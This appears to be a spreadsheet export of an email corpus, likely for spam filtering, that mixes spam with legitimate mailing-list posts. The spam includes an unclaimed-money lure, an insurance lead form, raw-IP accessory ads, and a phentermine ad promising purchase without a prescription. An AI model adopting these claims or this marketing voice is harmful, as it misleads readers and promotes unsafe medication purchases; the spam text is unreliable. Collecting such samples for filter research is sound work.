                   border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;CENTER&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;FONT color=#666666&gt;Since 1994, our Web site 
                   has reunited millions upon millions of dollars with thousands 
                   of rightful owners -- &lt;B&gt;who didn't even know&amp;nbsp;&lt;/B&gt; they 
                   had money waiting for them.&amp;nbsp;&lt;/FONT&gt; 
                   &lt;CENTER&gt;&lt;/CENTER&gt;&lt;/TD&gt;
                 &lt;TD vAlign=top width="50%" bgColor=#ffffff&gt;
                   &lt;P align=justify&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;B&gt;&lt;FONT 
                   color=#006666&gt;Click here&lt;/FONT&gt;&lt;/B&gt;&lt;/A&gt;&lt;FONT color=#666666&gt; 
                   NOW or on the link below to find out -- in seconds -- if there 
                   is money waiting to be claimed in your family name or that of 
                   somebody you know. The INITIAL SEARCH IS 
 FREE.&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width="100%" bgColor=#ffffff colSpan=2 height=153&gt;
                   &lt;P align=center&gt;&lt;FONT color=#000000 size=3&gt;&lt;B&gt;YOU HAVE NOTHING 
                   TO LOSE ....&amp;nbsp;&lt;BR&gt;TRY 
                   FOUNDMONEY TODAY&amp;nbsp;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
                   &lt;P align=center&gt;&lt;A href="http://track.linkgift.net/cgi-bin/a?e=3444431.13"&gt;&lt;FONT 
                   color=#006666&gt;&lt;B&gt;CLICK HERE NOW!&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
                   &lt;P&gt;&lt;FONT color=#666666&gt;Sincerely,&lt;BR&gt;LinkGift.com
                   &lt;/FONT&gt;&lt;/P&gt;
                   &lt;P&gt; 
       &lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;IMG 
       height=15 src="http://image.linkgift.net/promotions/fmimages/c-pix.gif" width=1 border=0&gt; 
   &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of LinkGift.com's websites or you signed up with a party that has contracted with LinkGift.com. To unsubscribe from our email newsletter, please visit &lt;a href=http://opt-out.linkgift.net/?e=zzzz@example.com&gt;http://opt-out.linkgift.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[4]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; MF&gt; I don't think free speech is a license to speak directly at
 &gt; and be in the
 &gt; MF&gt; physical presence of any particular individual of your
 &gt; choosing - especially
 &gt; MF&gt; when that individual is busy doing something else and isn't
 &gt; interested.
 Yep. I agree 100%
 &gt;
 &gt; Sure.  And that goes back to my second argument -- Cohen.   THey can
 &gt; walk away.   NObody compells them to stand there, I'll agree fully.
 &gt; But we still have a Constitutional right to speak out against
 &gt; policies, actions and grievances.
 &gt;
 &gt; Again.  If you want it another way, lets change the Constitution.
 Huh?  Are you saying that whoever has the loudest voice gets to be heard?
 Shouting down a public speaker could be considered a form of censorship. If
 shouting down public speakers is 'protected' it is only a matter of time
 before the people doing the shouting have their tactic used against
 them -every single time they open their mouth-. The tactic is stupid and
 non-productive and if generally used, will only result in chaos.  The tactic
 is just stupid ego-bation at best, unless the goal is to generate chaos.
 And humans whose goals and actions in life are to create chaos in society
 should be locked up (provided you can accurately identify them, which is not
 really possible anyway, but hey, this is my rant :-). IMHO.
 Bill
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Commissions Too High to Publish
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1C1E03_01C264B1.C98D8800
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Non-Med Level Term 15-20 &amp; 30 year with Return of Premium Rider!	
  It's Lucrative:	
  	 Commission so high we can't publish them
 Annualization Available 	
 Daily Commission by EFT 	
  It's Fast:	
  	 Qualifying policies processed in 4 days or company pays you
 $100.00 	
 Forms and Status from Internet 	
  It's Easy:	
  	 Non-medical underwriting (No Blood, No HOS, No Exam)* 	
  	 Ages 0-60	 $100,000	 
  	 Ages 61-70	 $50,000	 
  	 Easy To Complete Application 	
 Fax Application to Home Office (No Need to Mail Original) 	
  888-574-9088	
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	 	
 M14070PBL602
 *Issuance of the policy based on answers to medical questions
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_1C1E03_01C264B1.C98D8800
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Commissions Too High to Publish&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;=20
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#6633CC"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/top2.jpg" =
 width=3D"550" height=3D"150" alt=3D'Non-Med Level Term 15-20 &amp; 30 year =
 with Return of Premium Rider!'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/lucrativ.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Lucrative:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" rowspan=3D'3'&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Commission so high we can't publish them&lt;br&gt;
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Annualization Available &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Daily Commission by EFT
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/fast.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Fast:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" rowspan=3D'2'&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Qualifying policies processed in 4 days or company pays =
 you $100.00
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"517"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Forms and Status from Internet
               &lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/easy.gif" =
 width=3D"145" height=3D"36" alt=3D"It's Easy:"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"17" bgcolor=3D"#FFFFFF"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"517" bgcolor=3D"#FFFFFF"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#003399" size=3D"2"&gt;&lt;b&gt;
                 Non-medical underwriting (No Blood, No HOS, No =
 Exam)*&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"3" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"119"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"151"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Ages 0-60&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"263"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;$100,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"119"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"151"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Ages 61-70&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;td width=3D"263"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;$50,000&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"4" bgcolor=3D"#FFFFFF"&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"16" rowspan=3D"2"&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=3D"518"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#003399"&gt;&lt;b&gt;
                 Easy To Complete Application&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td width=3D"518"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#003399" size=3D"2"&gt;&lt;b&gt;
                 Fax Application to Home Office (No Need to Mail =
 Original)&lt;/b&gt;&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/phone.jpg" =
 width=3D"550" height=3D"109" alt=3D'888-574-9088'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#6633CC"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;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value=3D"lpi@skyenet.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"Life Pros Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/lifepro/logo.gif" =
 width=3D"550" height=3D"73"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#CCCCCC"&gt;=20
               &lt;div align=3D"center"&gt;&lt;font color=3D"#000000" size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif"&gt;M14070PBL602&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td bgcolor=3D"#CCCCCC" height=3D"2" align=3D"center"&gt;=20
                 &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;*Issuance=20
                   of the policy based on answers to medical =
 questions&lt;br&gt;
                   We don't want anybody to receive our mailing who does =
 not wish=20
                   to receive them. This is a professional communication =
 sent to=20
                   insurance professionals. To be removed from this =
 mailing list,=20
                   DO NOT REPLY to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout"&gt;http://www.insuranceiq.com/opt=
 out&lt;/a&gt;&lt;br&gt;
                   &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;=20
                 &lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_1C1E03_01C264B1.C98D8800--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The only medically proven way to lose weight... DHF84Z8F
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (sje726@aol.com) on Thursday, May 30, 2002 at 23:54:48
 ---------------------------------------------------------------------------
 .: 
 Looking to lose some weight before summer hits?
 Introducing Phentermine , the most popular weight loss drug in the world. 
 Over 50% of doctors prescriptions for weight loss are for Phentermine , making it the most widely used prescription weight loss product in the nation. 
 Phentermine  has been proven to keep cholesterol levels down, energy levels up, and most importantly help you lose pounds and inches in a relatively short period of time.
 Best of all, you don't need a prescription to order online!
 Takes only minutes to complete your order, and because you purchase online you pay NO doctors fees. All orders are shipped quickly and discreetly, and we now ship to all 50 states... click below for details!
 http://DDoHX@www.getphentermine.com/
 ----------------------------------------------------------------------------------------------------------------
 If you'd like to be removed from this mailing list, please simply click here www.deletemyrxmail.com
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: If You Own A Cell Phone......Please Read..... 5214
</t>
  </si>
  <si>
    <t xml:space="preserve">Unbelievable Prices On Cell Phones And Accessories:
 http://65.218.171.48
 Hands Free Ear Buds 1.99! 
 Phone Holsters 1.98! 
 Phone Cases 1.98! 
 Car Chargers 1.98! 
 Face Plates As Low As 2.98! 
 Lithium Ion Batteries As Low As 6.94! 
 http://65.218.171.48
 Click Below For Accessories On All NOKIA, MOTOROLA LG, NEXTEL, 
 SAMSUNG, QUALCOMM, ERICSSON, AUDIOVOX PHONES At Below 
 WHOLESALE PRICES!
 http://65.218.171.48
 ***NEW*** Now Also: Accessories For PALM III, PALM VII, 
 PALM IIIc, PALM V, PALM M100 &amp; M105, HANDSPRING VISOR, COMPAQ iPAQ*** 
 Car Chargers 6.95! 
 Leather Cases 13.98! 
 USB Chargers 11.98! 
 Hot Sync Cables11.98! 
 http://65.218.171.48
 ***If You Need Assistance Please Call Us  (732) 751-1457***
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 To be removed from future mailings please send your remove 
 request to: 3425342r@eudoramail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: find the bug
</t>
  </si>
  <si>
    <t xml:space="preserve">
 //this function should print all numbers up to 100...
 void print_nums()
 {
   int i;
   for(i = 0; i &lt; 10l; i++) {
     printf("%d\n",i);
   }
 }
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: My talk at UT Austin
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85505995
 Date: Not supplied
 I've been in Austin all weekend. On Friday, I spoke at the University of Texas 
 about EFF issues. Jon Lebkowsky was there -- hell, he organized it -- and he 
 blogged the hell out of the talk: 
     Entertainment industry has tradition of attacking technology: the piano 
     roll, the radio (sued by vaudeville), television (would destroy cinema!), 
     "the Betamax affair"... the latter being the first consumer VCR. In Betamax 
     case, argued that the ability to make a full copy of a broadcast work would 
     not be a fair use (in terms of copyright). It was illegal enough that the 
     VCR should be kept off the market, they argued. The Supreme Court got the 
     case, and the thing that shook out of it was the Betamax principle: a 
     technology is legal so long as it has substantial non-infringeing uses. 
     This principle is under attack. 
     Digital Millennium Copyright Act, 1998. Illegal to defeat a copyright 
     measure. Regionalization system for DVDs. This is a control that limits 
     distribution. John Johansen in Norway figured out how to break the content 
     scrambling system and allows you to move from one region to another, 
     override copy protection. It was called DeCSS - Johansen is facing trial 
     for creating a piece of code.  
 Link[1] (Wes blogged it, too[2]) Discuss[3]
 [1] http://www.weblogsky.com/2002_09_01_blarchive.html#85500802
 [2] http://wmf.editthispage.com/2002/09/27
 [3] http://www.quicktopic.com/boing/H/4rEePy7RSm38x
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Trend: Spam disguised as newsletters
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Kerry Nice" said:
 &gt; What about some reality check rules.  Yeah, you can pack in lots of things
 &gt; into the header to try and get some negative points, but do they all make
 &gt; sense in combination.  Can you have a Pine message id in the same header
 &gt; with an Outlook Express one or a Mutt User-Agent?
 Yes, this is a big bonus of meta rules (new in 2.40); we can now
 e.g. check for an Outlook-style forwarded message, and not give
 it negative points unless it contains other signs of being from
 Outlook.
 &gt; I think the headers should be paid special attention to.  The message
 &gt; content of something from the NY Times or Lockergnome might look spammy, but
 &gt; usually they don't forge or fake anything in the header.  Tone down the
 &gt; negative scores and ding them extra for any obvious forgeries.
 When we get more (good) "nice" tests, the GA will assign lower
 scores to them.  I think the current problem is that there are
 very few really good nice tests in the current rulebase, and lots
 of +ve tests that those newsletters hit, giving the GA a big
 problem to solve.
 --j.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</si>
  <si>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My brain hurts
</t>
  </si>
  <si>
    <t xml:space="preserve">Working too hard...
 Someone tell me a joke, or email me a beer or something...
 TIA,
   Rob.
      .-.                    Robert.Harley@argote.ch                    .-.
     /   \           .-.      Software Development       .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'       ArgoTech      `-'         \   /
              `-'                http://argote.ch/              `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: a problem with apt-get
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002, Thomas Vander Stichele wrote:
 &gt; Hi,
 &gt; 
 &gt; In my build scripts, I have problems with some of the kernel packages.
 &gt; 
 &gt; For kernel-sources, I get :
 &gt; 
 &gt; Package kernel-source is a virtual package provided by:
 &gt;   kernel-source#2.4.18-3 2.4.18-3
 &gt;   kernel-source#2.4.18-3 2.4.18-3
 &gt; 
 &gt; on running apt-get install kernel-source
 &gt; 
 &gt; Now, first of all, this doesn't really tell me what the two options are ;)
 &gt; Second, is there some way I can tell apt-get to install either ? This is 
 &gt; done from automatic build scripts so I'd like it to proceed anyway.
 That's just apt's way of telling you the package is in "AllowDuplicated", 
 meaning multiple versions of the package can be installed at the same 
 time. Yes the output is a bit strange.. especially when there's only one 
 version available.
 'apt-get install kernel-source#2.4.18-3' will install it...
 -- 
 	- Panu -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 10 Sep 2002 10:29:26 -0400 
 Tom Reingold &lt;noglider@pobox.com&gt; wrote:
 &gt; On Tue, 10 Sep 2002 01:20:56 PDT, J C Lawrence &lt;claw@kanga.nu&gt; wrote:
 &gt;&gt; Ahh.  At work we fire people who use Outlook (Literally true: They
 &gt;&gt; get escorted to the door, their badge confiscated, and told to return
 &gt;&gt; the next day to collect their office contents).
 &gt; Why?  What threat does Outlook pose to your organization?
 It places the company, corporate network and data at risk.
 Outlook is subject to an (absurdly large) number of exploits with more
 being regularly found.  An exploited system, to whatever extent, places
 other corporate systems at risk, customer systems at risk, company
 reputation and liability with customers at risk, and
 proprietary/corporate data at risk.  Further, users cannot be reliably
 expected to use Outlook in a safe manner.  The net result is that
 Outlook use is considered to be somewhere between criminal negligence
 and deliberately malicious as far as the employer is concerned.
 &gt;&gt; Have you looked into using a custom sequences file?
 &gt; More detail please?  I do use sequences, so I'm familiar with their
 &gt; use, but how can I make indices with them, and how can I keep them up
 &gt; to date?
 I don't use custom sequences, so I can't comment well.  I suspect that
 you'd have to use a cron job to maintain the sequences.
 &gt;&gt; The only thing I actually miss in that regard is support for S/MIME.
 &gt; You're probably running exmh on a local machine.  I'm running it on a
 &gt; very remote machine.  In this scenario, the mime handling is weak.
 Nope.  I run exmh on my desktops at home and at work with the resulting
 exmh windows being displayed on both my work and home desktops (gratis
 SSH X11 forwarding).  In fact, your message was read and replied to
 (this message) while at work, using an exmh instance running on my home
 machine.
 -- 
 J C Lawrence                
 ---------(*)                Satan, oscillate my metallic sonatas. 
 claw@kanga.nu               He lived as a devil, eh?		  
 http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: f-rpm] Re: Problem building lame-3.92-fr5.src.rpm on RH8
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 5 Oct 2002, Coy Krill wrote:
 &gt; Sure. I used the following command to rebuild the package:
 &gt; 
 &gt; rpmbuild --rebuild --target i586 lame-3.92-fr5.src.rpm
 &gt; 
 &gt; And here is the error output for the files:
 &gt; 
 &gt; RPM build errors:
 &gt;     user dude does not exist - using root
 &gt;     user dude does not exist - using root
 harmless ...
 &gt;     Installed (but unpackaged) file(s) found:
 &gt;    /usr/share/doc/lame/html/basic.html
 &gt;    /usr/share/doc/lame/html/contributors.html
 &gt;    /usr/share/doc/lame/html/examples.html
 &gt;    /usr/share/doc/lame/html/history.html
 &lt;snip&gt;
 This is a problem with the .spec file not accounting for all 
 the files produced.  see: 
   http://www.rpm.org/hintskinks/unpackaged-files/   
 -- Russ Herrold
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Razor problem
</t>
  </si>
  <si>
    <t xml:space="preserve">I just picked up Razor SDK 2.03 and  2.14 agents from the the razor site.
 I am using SuSe 7.3 - intalled SDK with no problems. All tests passed.
 When I try to make the 2.14 agents I get all kinds of errors. In
 particuliar it says the net::dns is missing. But it seems to be there. The
 SDK test passes it.
 Any help would be appreciated.
 Doug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</si>
  <si>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2.40 release procedure (why not give it a read)
</t>
  </si>
  <si>
    <t xml:space="preserve">I hope you all don't mind me creating a new thread and adding a Cc: to
 spamassassin-devel.  I want to make sure everyone reads Craig's email.
 (I don't really have any comments other than to endorse it and suggest
 creating a branch ASAP.)
 Craig R.Hughes &lt;craig@deersoft.com&gt; writes:
 &gt; Ok folks...  I think there's been some confusion, so I recommend 
 &gt; the following:
 &gt; 
 &gt; 1. Use the CVS tag spamassassin_pre_2_4_0 which I just created 
 &gt; to generate your mass-checks
 &gt; 2. Submit the results via rsync in the usual way ASAP
 &gt; 3. Justin and I will cooperate on running the GA sometime around 
 &gt; midnight PST (GMT-0800) on thursday/friday
 &gt; 
 &gt; Any good data that's in the rsync corpus by that time will be 
 &gt; used to feed the GA.  That will give everyone about 48 hours 
 &gt; from now to generate the logs and submit them, plus it'll give 
 &gt; Justin and me about 48 hours to tinker with the GA (and 
 &gt; hopefully get it compiling again on my machine grumble 
 &gt; grumble).  That should then yield a 2.40 release sometime on 
 &gt; friday, possibly saturday if we need to do multiple GA runs to 
 &gt; tweak things properly.
 &gt; 
 &gt; C
 &gt; 
 &gt; PS Volunteering Justin here, since I suspect he's probably fast 
 &gt; asleep right now.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Need a PDA that's more than a phonebook? (ZDNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Buyer's Alert | July 18, 2002&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt; 
 &lt;CENTER&gt;&lt;A name=top&gt;&lt;/A&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#232850 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=bottom&gt;
     &lt;TD width=440 colSpan=4&gt;&lt;IMG height=60 alt="ZDNet Buyers Alert Newsletter" 
       src="http://www.cnet.com/i/sh/nl/hd_buyers_alert.gif" width=440&gt;&lt;/TD&gt;
     &lt;TD vAlign=top align=middle width=160 bgColor=#ffffff rowSpan=2&gt;&lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
